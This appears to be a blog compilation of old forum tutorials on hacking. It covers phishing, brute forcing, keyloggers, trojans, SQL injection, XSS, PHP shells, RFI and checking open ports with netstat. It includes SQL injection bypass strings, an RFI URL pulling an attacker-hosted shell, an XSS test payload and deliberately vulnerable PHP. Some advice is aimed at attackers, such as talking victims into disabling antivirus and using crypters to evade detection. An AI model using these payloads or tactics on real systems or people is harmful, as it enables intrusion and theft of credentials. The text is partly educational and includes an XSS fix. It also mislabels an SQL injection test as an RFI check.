Complete HACKING information

Introduction:

We see a millions of people going to different forums and websites and asking “how do i hack an email?”, “Can you hack blah for me?”. So thought to create a tutorial which will give you the basic idea about what the heck is a “HACK”, and how to DEFEND YOUR SELF AGAINST HACKERS.

Disclaimer:

As i have seen controversies in the past, here is the disclaimer.

I or the staff of Go4expert.com’s does not take any responsibility if you use this tutorial in unethical way. This is written to help you to beware of whats going around, and save your self by not being hacked!

Background:

Hacking started way too far when the windowsd 98 was designed. Hacking is basically finding out the loop holes and trying leak some information out of it, which may lead you to get some critical information like passwords, credit card details. Sometimes hacking is done just because of the personal offesnses.

Things to remember

I will suggest you, KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THATS THE ONLY WAY YOU CAN LEARN.

Initialization:

Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.

1. Email or the user information
2. Web based hacking.

Email or user information:

These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:

a. Phishing
b. Brute Forcing
c. Keylogging
d. Trojans

a. Phishing:

Phishing is basically a massive attack. What a hacker does is, they created an absoulutely look alike page of some website like yahoo or gmail. They upload it to their own server. And give the link to any n00b user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to entering into ahcking world.
Most recent example in india was some scam with ICICI bank, lots of user info was stolen as far as i remember. I read it somewhere in the news paper and was thinking what the hell! ?

Disadvantages: Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.

b. Brute Forcing

Brute forcer is basically a program which could be called as a “cracker”. In brute focer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing english words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like “huge pass list” on different forums, they are nothing but the password list to put into your bruteforcer.!

Disadvantages:
1. Sometimes brute forcing may just go for ages!
2. It isnt guaranteed
3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect
4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the “image captcha” after 3 incorrect login attempts, which stops the bruteforcer.

P.S:- I have made some focused FTP, Gmail & Yahoo bruteforcers which are avilable on my website.

c. Keylogging

Keylogger helps you to create a little filed which is known as “server”. You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.
Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim’s computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information 

Disadvantages :
1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to desable the anti virus by bluffing something.
2. Sometimes firewall blocks the keylogs from being sent.

Tips :
1. There are some programs which are known as “crypters” which will help you to make your server’s undetectable. So your victim’s anti-virus would not be able to detect them.

d. Trojans:

Trojans are like father of keyloggers. Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim’s computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may kep on ejecting and re-inserting the cd ROM. Much more..

Disadvantages :
Same as keyloggers.

Tips :
Same as keylogger.

Web Hacking:

I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.

1. SQL Injection:

Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querie everytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.
So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website! 

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site’s URL is:

Code:
 yoursite.com/index.php?id=545

just add a ‘ like this at the end

Code:
 yoursite.com/index.php?id=545'

2. XSS:

XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up.

3. Shells:

Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire “FTP” account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.
This is also known as deface.

4. RFI:

RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:

Code:
 yoursite.com/shell.txt

and you found a vulnerable site to RFI… then you can do as follow:

Code:
 victimssite.com/index.php?page=yousite.com/shell.txt

This will again give u the access of your victim’s sites FTP , just as shell so you can f*ck up anything you want.

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site’s URL is:

Code:
 yoursite.com/index.php?id=545

just add something liek this at the end

Code:
 yoursite.com/index.php?id=http://www.google.com

And if it incldes the google page into your page, that means its vulnerable to RFI.

Reference : http://www.go4expert.com/forums/showthread.php?t=16514

Advertisements

Understanding Basic SQL Injection

SQL injection (also known as SQLI) is a code injection technique that occurs if the user-defined input data is not correctly filtered or sanitized of the ‘string literal escape characters’ embedded in SQL.

Basically SQLI is a way of injecting and executing arbitrary SQL statementsThe whole idea is to make the application execute our arbitrary code which was not intended. In this tutorial we’ll be looking on how a basic SQL code injection can cause the application to mess up its authentication login and which would eventually lead to data access. So what’s the waiting then let’s get started.

Authentication Bypass (SQL injection)

Most of the authentication scripts you’ll find on the web are not secured and despite this vulnerability first appeared in 1990’s  there are still many applications vulnerable to this attack.

How SQL injection works?

This attack simply exploits bad filtering or sanitizing mechanism in the database layer of an application, this vulnerability gives the room to attackers to basically alter arbitrary SQL code to be executed.

For example you have a basic SQL statement as follows:-

Code:
  SELECT * FROM Users where Name = ‘UserInput’;

Now if the page is vulnerable to this kind of attacks then an attacker have the room to alter anything to this SQL statement.
For Example the attacker can simple add

Code:
  ‘ or ‘1’ = ‘1

Which would result in :-

Code:
  SELECT * FROM Users where Name =  ‘’ or ‘1’ = ‘1’

Now if you know some basic SQL you can simply point out that this means that now the application will be forced to get all the users in the table as the statement now includes a or condition i.e ‘1’ = ‘1’ which in any case will always be true.

Demonstration

To demonstrate a basic SQL authentication bypass attack I have created a set of some php scripts.

defines.php

Code:
  <?php
  $tableName = "badlogin";
  $dbName               = "sqlnjection";
  $sqlServer = "localhost";
  $sqlUser = "root";
  $sqlPass = ""; 
  ?>

functions.php

Code:
  <?php
require "defines.php";

function checkTable()
{
	global $tableName;
	$query = "SELECT * from $tableName";
	$result = mysql_query($query) or die(mysql_error());
	if($result == FALSE) // Table is not created till
	createTable();
}
function createTable()
{
	global $tableName;
	$query = "CREATE TABLE $tableName(login char(50),pass char(50))";
	$result = mysql_query($query);
	$query = "INSERT INTO $tableName(login,pass) values('admin','UnCrACkAbLe')";
	$result = mysql_query($query);
}
function checkCredentials($login,$pass)
{
	global $tableName;
	$query = "SELECT * FROM $tableName WHERE login='$login' AND pass='$pass';";
	//            echo "<br/>$query<br/>";
	$result = mysql_query($query) or die(mysql_error());
	$rowsnum = mysql_num_rows($result);
	if($rowsnum > 0)
	{
		congrats();
	}
}
function congrats()
{
	echo"<p class='warning'>Congratulations You just completed the Challenge...</p>";
	echo"<script type='text/javascript'>alert('Mission Completed');</script>";
	// The redirection and Points award code should go here
}
?>

sqlInjection.php

Code:
<?php
require "defines.php";
require "functions.php";
?>
<html>
<head>
	<title>Bad Login</title>
	<link href='style.css' type='text/css' rel='stylesheet'/>
</head>
<body>
	<h1>Welcome to bad Login Please Enter your Credentals</h1>
	<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
	<table align="center">
		<tr>
			<td>Login</td>
			<td> : <input type="text" name="login"/></td>
		</tr>
		<tr>
			<td>Password</td>
			<td> : <input type="text" name="email"/></td>
		</tr>	
		<tr>
			<td><input type="submit" name="go"/></td>
		</tr>
	</table>
	</form>
<?php   
if( isset($_POST['login']) && isset($_POST['email']) &&	isset($_POST['go']) )
{
	mysql_connect("$sqlServer","$sqlUser","$sqlPass") or mysql_error();
	mysql_select_db("$dbName") or mysql_error();
	//checking if table exists
	checkTable(); // checks if the table exists and create new if not found
	checkCredentials($_POST['login'],$_POST['email']);
}
?>

</body>
</html>

Constructing the Attack String :-

Our main purpose for this scenario is to check is to exploit the vulnerability in the above set of pages and gain access to ‘admin’ account , We can simply do that by the following ways :-

  1. Giving “admin’#” as a username to the application , This means that after writing admin as a username we used ‘#’ to comment any other code after that.
  2. Giving “admin” as username and “ ‘ or ‘1’ = ‘1 “ as password. This would trick the application to use an ‘or always true’ condition which would eventually result in authentication bypass.

 

Reference : http://www.go4expert.com/forums/showthread.php?t=26236

Basics of XSS or Cross Site Scripting Explained

Cross Site Scripting also known as XSS is a popular type of Client Site Attack, It is a type of attack which occurs in Web-Applications and allows an attacker to inject desired client-side scripts into Web-Pages viewed by others.

Types of XSS
This attack is mainly of 2 types

Non-Persistent

This type of attack is carried out by injecting some client side code in a Vulnerable URL. Now further the Attacker can spread this URL and send it to his/her victims by means of some social engineering etc , on clicking these links the Victims Unknowingly executes the injected code , Which in turn can result in Cookie stealing , Privacy Disclosure etc.

Persistent

This type of Attack is more dangerous and it occurs when the data provided by the attacker is stored by the server, which is viewed as a normal page to the normal users.
Now Further the Attacker can simply inject some malicious Client Side Code which in turn can result in Defacement of the Website, Cookie Stealing, and Privacy Disclosure etc.

Demo

Now that we know something about what are these type of vulnerabilities and how they occur let’s actually take a look at how these vulnerabilities occur How to test it!
Xss.php

Code: php
<html>
<head>
<title>Vulnerable to XSS</title>
</head>
</html>
<body>
<h1>Welcome to XSS Demo Page</h1>

<p>The Data Entered is As Follows :- </p>

<?php

/**
* @author lionaneesh
* @copyright 2011
*/

if(isset($_GET[‘data’]))
{
$data = $_GET[‘data’];
}
else
{
$data = “No Data Entered !”;
}

echo “<i>$data</i>”;

?>

</body>

Now Just Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Wow! An Alert box saying XSS will appear proving that your injected code actually executed! Now this is just an example of how these vulnerabilities can occur in web-applications and how you can test them!

How to Fix Them

If you’re one of the people whose site is vulnerable to this type of attack I recommend fixing it as soon as possible, For the scope of this tutorial I’ll be only covering on how these vulnerabilities can be fixed in PHP , If you are using some other language , I recommend you to check your Language Reference or Contact Me .

PHP Provides a function called htmlspecialchars() which converts the chars into their HTML entities. Now we’ll just use this in the above code and check what happens.
Xss.php (line number 33)

Code: php
echo htmlspecialchars(“<i>$data</i>”);

Now let’s once more Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Voila! U can notice the change now!

Reference : http://www.go4expert.com/forums/showthread.php?t=26878

How to check for open Ports?

Step 1:

Open up command prompt. Press “START” and “RUN” type “cmd” and use the command “netstat -a”
Now you will get up a list so showing you poeple so are connected to your computer. This list will look like this.

Proto: TCP
Local Address: thiscomputer3123:1031
Foreign Address: thiscomputerhaha342:ftp
State: ESTABLISHED

“Proto” showes what Protocol it is in this case it is (Transmission Control Protocol) TCP.
“Local Address” This is your computer also you see a number behind your computer name. 1031 this is the port so is used by your computer.
“Foreign Address” This is the Remote computer and the port is ftp. (File Transfer Protocol) so the port is 21 since the Default port to FTP is 21.
“State” This showes you if the computer is connected to you or not. ESTABLISHED means that it is connected to you.

So now you know how to read the result. Lets go to Step 2.

Step 2:

Ports:

0 – 1023 = This ports are used by “Services”
1024 – 49151 = This ports are used by “Network” ect Your Internet Browser and E-Mail clients.
49152 – 65535 = This ports are used by private users they are rarly used so this may indicate that you are infected with something.

Step 3:
You can easy check out the ports just with do a google search. Open up your “Internet Browser” type “www.google.com” in the address bar and type in ect “Port 1031” now it will give you sites about the “1031 port” or you may search for Trojan Horse port list or something like that to check out if the port is a Trojan Horse.

Reference : http://www.go4expert.com/forums/showthread.php?t=12222